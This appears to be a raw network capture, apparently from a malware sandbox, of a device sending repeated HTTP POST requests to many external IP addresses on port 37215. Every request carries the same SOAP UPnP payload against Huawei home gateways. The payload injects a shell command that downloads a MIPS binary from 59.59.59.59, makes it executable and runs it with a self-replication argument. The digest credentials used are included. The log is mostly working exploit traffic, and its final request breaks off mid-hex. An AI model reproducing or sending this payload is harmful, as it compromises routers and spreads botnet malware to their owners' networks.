                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2259192.168.2.155310692.69.60.2637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.299262047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2260192.168.2.1558174157.250.190.16937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.299390078 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2261192.168.2.1535794105.159.44.1337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.299451113 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2262192.168.2.1551792197.37.91.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.299616098 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2263192.168.2.1534090197.98.162.6637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.299654961 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2264192.168.2.1544572157.210.179.23837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.299938917 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2265192.168.2.154655641.2.14.18037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.299997091 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2266192.168.2.1543736181.48.223.17837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.300014973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2267192.168.2.153797240.161.100.23437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.305001974 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2268192.168.2.1550082157.208.31.4537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.305965900 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 